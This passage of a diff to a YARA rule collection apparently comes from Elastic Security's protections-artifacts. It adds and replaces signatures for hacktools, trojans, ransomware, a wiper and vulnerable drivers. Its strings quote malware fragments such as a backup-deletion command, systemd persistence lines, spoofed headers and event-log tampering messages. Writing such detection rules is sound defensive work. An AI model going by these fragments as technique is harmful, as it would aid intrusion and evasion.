"480af18104198ad3db1518501ee58f9c4aecd19dbbf2c5dd7694d1d87e9aeac7" - logic_hash = "67d5123b706685ea5ab939aec31cb1549297778d91dd38b14e109945c52da71a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_SharpUp.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "45e92b991b3633b446473115f97366d9f35acd446d00cd4a05981a056660ad27" + logic_hash = "62e9aafd308aacbc7a124c707e230c5a9ffde4f6929a5feada5497e3eae7668c" + score = 75 + quality = 73 + tags = "FILE, MEMORY" + fingerprint = "4c6e70b7ce3eb3fc05966af6c3847f4b7282059e05c089c20f39f226efb9bf87" + severity = 100 + arch_context = "x86" + scan_context = "file, memory" + license = "Elastic License v2" + os = "windows" + + strings: + $guid = "FDD654F5-5C54-4D93-BF8E-FAF11B00E3E9" ascii wide nocase + $str0 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.bat|\\.ps1|\\.vbs))\\W*" ascii wide + $str1 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii wide + $str2 = "SELECT * FROM win32_service WHERE Name LIKE '{0}'" ascii wide + $print_str1 = "[!] Modifialbe scheduled tasks were not evaluated due to permissions." ascii wide + $print_str2 = "[+] Potenatially Hijackable DLL: {0}" ascii wide + $print_str3 = "Registry AutoLogon Found" ascii wide + + condition: + $guid or ( all of ($str*) and 1 of ($print_str*)) +} +rule ELASTIC_Windows_Hacktool_Leigod_89397Ebf : FILE +{ + meta: + description = "Detects Windows Hacktool Leigod (Windows.Hacktool.LeiGod)" + author = "Elastic Security" + id = "89397ebf-2fdb-4607-85a1-b9c378b4e256" + date = "2022-04-04" + modified = "2022-04-04" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_LeiGod.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ae5cc99f3c61c86c7624b064fd188262e0160645c1676d231516bf4e716a22d3" + logic_hash = "e887c34c624a182a3c57a55abe02784c4350d3956bcfd9f7918f08a464819e63" + score = 75 + quality = 75 + tags = "FILE" + fingerprint = "04709d703cd0a062029a05baee160eb9579fe0503984f3059ce49e1bcfa6e963" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $str1 = "\\Device\\CtrlLeiGod" wide fullword + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 +} +rule ELASTIC_Windows_Hacktool_Leigod_3F5C98C4 : FILE +{ + meta: + description = "Detects Windows Hacktool Leigod (Windows.Hacktool.LeiGod)" + author = "Elastic Security" + id = "3f5c98c4-03ba-4919-90b0-604d3cb9361e" + date = "2022-04-04" + modified = "2022-04-04" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_LeiGod.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0c42fe45ffa9a9c36c87a7f01510a077da6340ffd86bf8509f02c6939da133c5" + logic_hash = "7570bf1a69df6b493bde41c1de27969e36a3fcb59be574ee2e24e3a61347a146" + score = 75 + quality = 75 + tags = "FILE" + fingerprint = "883dcad7097ad5713c4f45ce2fc232c3c1e61cf9dfdc81a194124d5995a64c9e" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $str1 = "\\LgDCatcher.pdb" + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 +} +rule ELASTIC_Windows_Vulndriver_Elby_65B09743 : FILE +{ + meta: + description = "Name: ElbyCDIO.sys, Version: 6.0.3.2" + author = "Elastic Security" + id = "65b09743-029d-456a-b7f4-3cd055a0e0e2" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Elby.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b" + logic_hash = "7c7438520b238daf38d4ac91cbdee48bbfa9c85bd76208a436ce59edcfcecb80" score = 75 quality = 75 + tags = "FILE" + fingerprint = "88bfab229f2f2d66b4c732a6548ee6f31e6b0905eeea3b8f0f874094c1dbc98a" + threat_name = "Windows.VulnDriver.Elby" + severity = 50 + arch_context = "x86" + scan_context = "file" + license = "Elastic License v2" + os = "windows" + + strings: + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 45 00 6C 00 62 00 79 00 43 00 44 00 49 00 4F 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x06][\x00-\x00])([\x00-\x02][\x00-\x00])([\x00-\x03][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x05][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x06][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00]))/ + + condition: + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version +} +rule ELASTIC_Windows_Trojan_Pandastealer_8B333E76 : FILE MEMORY +{ + meta: + description = "Detects Windows Trojan Pandastealer (Windows.Trojan.Pandastealer)" + author = "Elastic Security" + id = "8b333e76-f723-4093-ad72-2f5d42aaa9c9" + date = "2021-09-02" + modified = "2022-01-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Pandastealer.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935" + logic_hash = "5878799338fc18bac0f946faeadd59c921dee32c9391fc12d22c72c0cd6733a8" + score = 75 + quality = 25 tags = "FILE, MEMORY" - fingerprint = "a7a1e6d5fafdddc7d4699710edf407653968ffd40747c50f26ef63a6cb623bbe" + fingerprint = "873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56465,31 +57126,66 @@ rule ELASTIC_Windows_Ransomware_Ransomexx_Fabff49C : FILE MEMORY os = "windows" strings: - $a1 = "ransom.exx" ascii fullword - $a2 = "Infrastructure rebuild will cost you MUCH more." wide fullword - $a3 = "Your files are securely ENCRYPTED." wide fullword - $a4 = "delete catalog -quiet" wide fullword + $a1 = "] - [user: " ascii fullword + $a2 = "[-] data unpacked failed" ascii fullword + $a3 = "[+] data unpacked" ascii fullword + $a4 = "\\history\\" ascii fullword + $a5 = "PlayerName" ascii fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Sambashell_F423755D : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Phant0M_2D6F9B57 : FILE MEMORY { meta: - description = "Detects Linux Trojan Sambashell (Linux.Trojan.Sambashell)" + description = "Detects Windows Hacktool Phant0M (Windows.Hacktool.Phant0m)" author = "Elastic Security" - id = "f423755d-60ec-4442-beb1-0820df0fe00b" - date = "2021-01-12" - modified = "2021-09-16" + id = "2d6f9b57-bde0-4570-8e38-187dbf05e6d3" + date = "2024-02-28" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sambashell.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bd8a3728a59afbf433799578ef597b9a7211c8d62e87a25209398814851a77ea" - logic_hash = "b93c671fae87cd635679142d248cb2b754389ba3b416f3370ea331640eb906ab" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Phant0m.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "30978aadd7d7bc86e735facb5046942792ad1beab6919754e6765e0ccbcf89d6" + logic_hash = "a66f8779f77b216f7831617a34c008e4202f36e74f2866c9792cee34b804408d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ea13320c358cadc8187592de73ceb260a00f28907567002d4f093be21f111f74" + fingerprint = "d4a92775e76bbb00e677a289942f9b3f8101a1dc2f55b30cfa32e4c7feae6c8a" + severity = 100 + arch_context = "x86" + scan_context = "file, memory" + license = "Elastic License v2" + os = "windows" + + strings: + $api = "NtQueryInformationThread" + $s1 = "Suspending EventLog thread %d with start address %p" + $s2 = "Found the EventLog Module (wevtsvc.dll) at %p" + $s3 = "Event Log service PID detected as %d." + $s4 = "Thread %d is detected and successfully killed." + $s5 = "Windows EventLog module %S at %p" + + condition: + $api and 2 of ($s*) +} +rule ELASTIC_Linux_Trojan_Lady_75F6392C : FILE MEMORY +{ + meta: + description = "Detects Linux Trojan Lady (Linux.Trojan.Lady)" + author = "Elastic Security" + id = "75f6392c-fc13-4abb-a391-b5f1ea1039d8" + date = "2022-01-05" + modified = "2022-01-26" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Lady.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c257ac7bd3a9639e0d67a7db603d5bc8d8505f6f2107a26c2615c5838cf11826" + logic_hash = "5160b6ab4800c72b48b501787f3164c2ba1061a2abe21c63180e02d6791a4c12" + score = 75 + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "da6d4dff230120eed94e04b0e6060713c2bc17da54c098e9a9f3ec7a8200b9bf" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56497,161 +57193,150 @@ rule ELASTIC_Linux_Trojan_Sambashell_F423755D : FILE MEMORY os = "linux" strings: - $a = { 00 01 00 00 00 FC 0E 00 00 FC 1E 00 00 FC 1E 00 00 74 28 00 00 } + $a = { 57 72 69 00 49 3B 66 10 76 38 48 83 EC 18 48 89 6C 24 10 48 8D 6C } condition: all of them } -rule ELASTIC_Multi_Hacktool_Rakshasa_D5D3Ef21 : FILE MEMORY +rule ELASTIC_Windows_Packer_Scrubcrypt_6A75A4Bb : FILE MEMORY { meta: - description = "Detects Multi Hacktool Rakshasa (Multi.Hacktool.Rakshasa)" + description = "Detects Windows Packer Scrubcrypt (Windows.Packer.ScrubCrypt)" author = "Elastic Security" - id = "d5d3ef21-e004-4cb4-8f9f-541e831c8e08" - date = "2024-01-24" - modified = "2024-01-29" - reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_Hacktool_Rakshasa.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ccfa30a40445d5237aaee1e015ecfcd9bdbe7665a6dc2736b28e5ebf07ec4597" - logic_hash = "123cbea0ce02012a9b22a4a241d11aa9acbb58b50a1bd9228da7cadbf0fa1b4e" + id = "6a75a4bb-8026-4c33-af39-621d76f3baba" + date = "2023-04-18" + modified = "2023-06-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Packer_ScrubCrypt.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "05c1eea2ff8c31aa5baf1dfd8015988f7e737753275ed1c8c29013a3a7414b50" + logic_hash = "edcaa6f1cc85ef084ae5bf2524f39869a90b008dce85e72bca4835565f067ca7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bd25f85a419679d2278e2e3951531950296785ac888bc69b513bab0a9936eacf" + fingerprint = "263175cbdc74502a595664833c90bf0a27f2bf20c227775658d552e29d98620e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "windows" strings: - $a1 = { 35 B8 00 00 00 48 89 74 24 38 48 89 5C 24 40 48 89 4C 24 48 48 89 54 } - $a2 = "rakshasa/server.init.4.func2" ascii fullword - $a3 = "type..eq.rakshasa/server.Conn" ascii fullword - $a4 = "rakshasa_lite/aes.Str2bytes" ascii fullword - $a5 = "rakshasa_lite/server.doShellcode" ascii fullword + $a = { 43 68 65 63 6B 52 65 6D 6F 74 65 44 65 62 75 67 67 65 72 50 72 65 73 65 6E 74 00 49 73 44 65 62 75 67 67 65 72 50 72 65 73 65 6E 74 } + $b = { 53 63 72 75 62 43 72 79 70 74 00 53 74 61 72 74 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Vulndriver_Zam_928812A7 : FILE +rule ELASTIC_Windows_Wiper_Hermeticwiper_7206A969 : FILE MEMORY { meta: - description = "Detects Windows Vulndriver Zam (Windows.VulnDriver.Zam)" + description = "Detects Windows Wiper Hermeticwiper (Windows.Wiper.HermeticWiper)" author = "Elastic Security" - id = "928812a7-ac7c-47cf-9111-11470b661d46" - date = "2022-04-04" - modified = "2022-04-04" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_Zam.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91" - logic_hash = "82ca874d60d8a0ee04aca39f59415f22797e7e0337314c88dd8ebad1a823d200" + id = "7206a969-bbd6-4c2d-a19d-380b71a4ab08" + date = "2022-02-24" + modified = "2022-02-24" + reference = "https://www.elastic.co/security-labs/elastic-protects-against-data-wiper-malware-targeting-ukraine-hermeticwiper" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Wiper_HermeticWiper.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591" + logic_hash = "84c61b8223a6ebf1ccfa4fdccee3c9091abca4553e55ac6c2492cff5503b4774" score = 75 quality = 75 - tags = "FILE" - fingerprint = "8e5db0d4fee806538929680e7d3521b111b0e09fcc3eba3c191f6787375999cc" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "e3486c785f99f4376d4161704afcaf61e8a5ab6101463a76d134469f8a5581bf" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $pdb_64 = "AntiMalware\\bin\\zam64.pdb" - $pdb_32 = "AntiMalware\\bin\\zam32.pdb" + $a1 = "\\\\?\\C:\\Windows\\System32\\winevt\\Logs" wide fullword + $a2 = "\\\\.\\EPMNTDRV\\%u" wide fullword + $a3 = "tdrv.pdb" ascii fullword + $a4 = "%s%.2s" wide fullword + $a5 = "ccessdri" ascii fullword + $a6 = "Hermetica Digital" condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and any of ($pdb_*) + all of them } -rule ELASTIC_Linux_Trojan_Zerobot_185E2396 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Wikiloader_C57F3F88 : FILE MEMORY { meta: - description = "Strings found in the zerobot startup / persistanse functions" + description = "Detects Windows Trojan Wikiloader (Windows.Trojan.WikiLoader)" author = "Elastic Security" - id = "185e2396-f9eb-42e6-b78b-f8c01dbd3fd8" - date = "2022-12-16" - modified = "2024-02-13" + id = "c57f3f88-0d2c-41a6-b2f9-839b1f1e1193" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Zerobot.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f9fc370955490bdf38fc63ca0540ce1ea6f7eca5123aa4eef730cb618da8551f" - logic_hash = "caa21cc019d8e4549d976f8b4f98d930ef7acf4c39c41956ae35fa78c975e016" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_WikiLoader.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0f71b1805d7feb6830b856c5a5328d3a132af4c37fcd747d82beb0f61c77f6f5" + logic_hash = "408c6d811232dbd0c87f75fd28508366151cf9f2f10f012919588db1919e406b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f7ce4eebd5f13af3a480dfe23d86394c7e0f85f284a7c2900ab3fad944b08752" - threat_name = "Linux.Trojan.Zerobot" + fingerprint = "a3802da23431fcbc890a5164d6acdbf29ec29bf1a82d4b862495edd8ae642d52" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $startup_method_1_0 = "/usr/bin/sshf" - $startup_method_1_1 = "start on filesystem" - $startup_method_1_2 = "exec /usr/bin/sshf" - $startup_method_2_0 = "Description=Hehehe" - $startup_method_2_1 = "/lib/systemd/system/sshf.service" - $start_service_0 = "service enable sshf" - $start_service_1 = "systemctl enable sshf" + $a = { 48 81 EC 08 01 00 00 48 89 CB 48 31 C0 48 89 E9 48 29 E1 48 89 E7 F3 AA 48 89 D9 48 89 4D 80 48 89 95 78 FF FF FF 4C 89 45 C0 4C 89 4D 88 4D 89 D4 4D 89 DD 4C 89 65 C8 49 83 ED 10 4C 89 6D 98 } condition: - ( all of ($startup_method_1_*) or all of ($startup_method_2_*)) and 1 of ($start_service_*) + all of them } -rule ELASTIC_Linux_Trojan_Zerobot_3A5B56Dd : FILE MEMORY +rule ELASTIC_Windows_Trojan_Wikiloader_99681F1C : FILE MEMORY { meta: - description = "Strings found in the Zerobot Spoofed Header method" + description = "Detects Windows Trojan Wikiloader (Windows.Trojan.WikiLoader)" author = "Elastic Security" - id = "3a5b56dd-e829-44bb-ae70-d7001addd057" - date = "2022-12-16" - modified = "2024-02-13" + id = "99681f1c-8b32-4cb0-ab6b-640b316e587a" + date = "2024-01-17" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Zerobot.yar#L28-L51" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f9fc370955490bdf38fc63ca0540ce1ea6f7eca5123aa4eef730cb618da8551f" - logic_hash = "2491fff4ad0327e0440d842f221fb6623c8efd97e2991bf2090abceaef9c2ccf" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_WikiLoader.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0b02cfe16ac73f2e7dc52eaf3b93279b7d02b3d64d061782dfed0c55ab621a8e" + logic_hash = "fb293d74186e778856780377120ac2ebe9550a508a0b33e706c39f93a5509df8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9800a241ab602434426830110ce244cdfd0023176e5fa64e2b8761234ed6f529" - threat_name = "Linux.Trojan.Zerobot" + fingerprint = "1cd978adc6cbd36a5738fb4c26a2ba4aaa8e69a035bd2618ef2175b3bb2dc4b6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $HootSpoofHeader_0 = "X-Forwarded-Proto: Http" - $HootSpoofHeader_1 = "X-Forwarded-Host: %s, 1.1.1.1" - $HootSpoofHeader_2 = "Client-IP: %s" - $HootSpoofHeader_3 = "Real-IP: %s" - $HootSpoofHeader_4 = "X-Forwarded-For: %s" + $a = { 48 83 EC 08 48 89 E0 4C 89 20 48 83 EC 08 48 89 E0 4C 89 28 48 83 EC 08 48 89 E0 4C 89 30 48 83 EC 08 48 89 E0 4C 89 38 48 89 E5 48 83 EC 08 48 83 EC 60 48 89 CB 48 31 C0 48 89 E9 48 29 E1 48 } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Trojan_Darkcloud_9905Abce : FILE MEMORY +rule ELASTIC_Windows_Trojan_Lokibot_1F885282 : FILE MEMORY { meta: - description = "Detects Windows Trojan Darkcloud (Windows.Trojan.DarkCloud)" + description = "Detects Windows Trojan Lokibot (Windows.Trojan.Lokibot)" author = "Elastic Security" - id = "9905abce-cbfc-4c92-aef6-38f2099eb5da" - date = "2023-05-03" - modified = "2023-06-13" + id = "1f885282-b60e-491e-ae1b-d26825e5aadb" + date = "2021-06-22" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_DarkCloud.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "500cb8459c19acd5a1144c4b509c14dbddec74ad623896bfe946fde1cd99a571" - logic_hash = "27d3841d6acf87f5c9c03d643c7859d9eaf42e49ed0241b761f858c669c4e931" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Lokibot.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409" + logic_hash = "c76941a83e18f11ed5af701e89616d324ddba613a95069997ea8f1830f328307" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5aeb210b37f4b2b4032917f53f2fb0422132aa1f8cddf0f47bccf50ff68ce00c" + fingerprint = "a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -56659,59 +57344,58 @@ rule ELASTIC_Windows_Trojan_Darkcloud_9905Abce : FILE MEMORY os = "windows" strings: - $a1 = { 8D 45 DC 57 57 6A 01 6A 11 50 6A 01 68 80 00 00 00 89 7D E8 89 } - $a2 = { C8 33 FF 50 57 FF D6 8D 4D DC 51 57 FF D6 C3 8B 4D F0 8B 45 } + $a1 = "MAC=%02X%02X%02XINSTALL=%08X%08Xk" fullword condition: all of them } -rule ELASTIC_Linux_Exploit_Alie_E69De1Ee : FILE MEMORY +rule ELASTIC_Windows_Trojan_Lokibot_0F421617 : FILE MEMORY { meta: - description = "Detects Linux Exploit Alie (Linux.Exploit.Alie)" + description = "Detects Windows Trojan Lokibot (Windows.Trojan.Lokibot)" author = "Elastic Security" - id = "e69de1ee-294d-437e-a943-abb731842523" - date = "2021-04-06" - modified = "2021-09-16" + id = "0f421617-df2b-4cb5-9d10-d984f6553012" + date = "2021-07-20" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Alie.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "882839549f062ab4cbe6df91336ed320eaf6c2300fc2ed64d1877426a0da567d" - logic_hash = "bb4625751c924b9ff5d32cc044fcff68892e82d9e94d679c4e4c8286f680a854" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Lokibot.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080" + logic_hash = "0076ccbe43ae77e3a80164d43832643f077e659a595fff01c87694e2274c5e86" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "01fa5343fa0fb60c320f9fa49beb9c7a8a821ace7f1d6e48ea103e746b3f27a2" + fingerprint = "9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 0C 8D 4B 08 8D 53 0C B0 0B CD 80 89 C3 31 C0 B0 } + $a = { 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6 } condition: all of them } -rule ELASTIC_Windows_Hacktool_Physmem_Cc0978Df : FILE +rule ELASTIC_Windows_Vulndriver_Hpportio_B31E3473 : FILE { meta: - description = "Name: physmem.sys" + description = "Name: HpPortIox64.sys, Version: 1.2.0.9" author = "Elastic Security" - id = "cc0978df-153e-4421-8be8-37a0824133e2" + id = "b31e3473-b87e-47df-b3ec-b09c69dcbb4e" date = "2022-04-07" modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_PhysMem.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d" - logic_hash = "e2fabf5889dbdc98dc6942be4fb0de4351d64a06bab945993b2a2c4afe89984e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_HpPortIo.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5" + logic_hash = "e449b45f3cf2836254614bbdc957aa7093162fc1acd672edd931d5f240503963" score = 75 quality = 75 tags = "FILE" - fingerprint = "b94d5530dc3db4101b6ef06dc2421a10785f47bcb26d54f309a250a68699fa83" - threat_name = "Windows.Hacktool.PhysMem" + fingerprint = "66067334492941eb2da8c72dc0d2f55ba1c2b564904f40b6e77925262501abd9" + threat_name = "Windows.VulnDriver.HpPortIo" severity = 50 arch_context = "x86" scan_context = "file" @@ -56719,28 +57403,91 @@ rule ELASTIC_Windows_Hacktool_Physmem_Cc0978Df : FILE os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 70 00 68 00 79 00 73 00 6D 00 65 00 6D 00 2E 00 73 00 79 00 73 00 00 00 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 48 00 70 00 50 00 6F 00 72 00 74 00 49 00 6F 00 78 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x02][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x09][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name + int16 ( 